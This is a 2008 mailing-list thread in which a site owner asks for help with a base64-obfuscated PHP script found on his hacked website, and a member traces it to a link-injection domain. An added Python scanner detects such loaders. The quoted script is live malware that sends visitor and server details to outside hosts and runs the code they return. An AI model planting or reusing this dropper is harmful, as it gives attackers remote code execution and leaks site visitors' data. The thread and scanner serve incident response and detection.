Wow.... Thanks Sheila.
This script was loaded into many directories, some of which did not start out writeable. Could someone have changed all my permissions and then inserted this? What kind of hidden links should I look for, and what might they do? :((((

On Jun 17, 2008, at 2:18 PM, Sheila Fenelon wrote:

> I decoded some of the strings in the script and found
> http://7.rssnews.ws
> Googling for 7.rssnews.ws yields this discussion
>
> http://forums.oscommerce.com/lofiversion/index.php?t301350.html
>
> It's an OsCommerce forum but I don't think this is necessarily an
> OsCommerce problem. You apparently have a writable directory
> somewhere. The code is used to add hidden links to pages.
>
> Googling for rssnews.ws provides more links.
>
> Timestamps and server logs will tell you more about what happened.
> If you haven't done so already, you should notify your host.
>
> Sheila
>
> steve miller wrote:
>> Hello...
>> I just found a bad script on my website :(
>> Can anyone here tell me what they might have stolen?
>> Here is the script:
>> error_reporting(0);$s="e";
>> $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
>> $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
>> $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
>> $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
>> $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
>> $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
>> $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
>> $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
>> $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
>> $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
>> $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
>> if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
>> else if (include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));
>> else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);
>> else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);};
>
> ____ • The WDVL Discussion List from WDVL.COM • ____
> To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] dl.sparklist.com or
> use the web interface http://e-newsletters.internet.com/discussionlists.html/
> Send Your Posts To: [email protected]
> To change subscription settings, add a password or view the web
> interface:
> http://intm-dl.sparklist.com/read/?forum=wdvltalk
>
> ________________ http://www.wdvl.com _______________________
>
> You are currently subscribed to wdvltalk as: [EMAIL PROTECTED]
> To unsubscribe send a blank email to
> [EMAIL PROTECTED]
> To unsubscribe via postal mail, please contact us at:
> Jupitermedia Corp.
> Attn: Discussion List Management
> 475 Park Avenue South
> New York, NY 10016
>
> Please include the email address which you have been contacted with.
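Added example (not part of the original thread and not code from any poster): a Python triage helper that automates the decoding step Sheila describes and reports every include, file_get_contents or curl_init call whose base64-obscured argument decodes to a URL, so the same dropper can be located in each directory it was copied into. The function names, the .php extension filter and the choice of SAMPLE excerpt are assumptions of this example.

```python
import base64
import os
import re

# One base64_decode("...") call; PHP allows whitespace before the parenthesis.
B64 = r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)'
# A call that loads or fetches content, whose argument begins with a chain of
# base64_decode() calls joined by PHP's "." concatenation operator.
SINK = re.compile(
    r'\b(include(?:_once)?|require(?:_once)?|file_get_contents|curl_init)'
    r'\s*\(\s*((?:' + B64 + r'\s*\.?\s*)+)', re.IGNORECASE)
URL_SCHEMES = ("http://", "https://", "ftp://")

# Excerpt of the script quoted in the thread (two of its four branches).
SAMPLE = (
    'if ((include(base64_decode("aHR0cDovLw==").base64_decode'
    '("d3d3My5yc3NuZXdzLndz")."/?".$str))){} '
    'else if ($c=file_get_contents(base64_decode'
    '("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);'
)

def find_remote_loaders(php_source):
    """Return (function, decoded_url) for each sink fed by base64 literals."""
    hits = []
    for m in SINK.finditer(php_source):
        try:
            target = "".join(
                base64.b64decode(lit).decode("utf-8", "replace")
                for lit in re.findall(B64, m.group(2)))
        except ValueError:  # malformed base64: not this pattern
            continue
        if target.lower().startswith(URL_SCHEMES):
            hits.append((m.group(1).lower(), target))
    return hits

def scan_tree(root):
    """Yield (path, hits) for each .php file under root containing a loader."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):  # assumption: PHP files end in .php
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_remote_loaders(fh.read())
            if hits:
                yield path, hits

if __name__ == "__main__":
    for func, url in find_remote_loaders(SAMPLE):
        print(func, "->", url)
```

Files reported by scan_tree are candidates for comparison against a known-good copy of the site; their modification timestamps give a window to check in the server logs.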
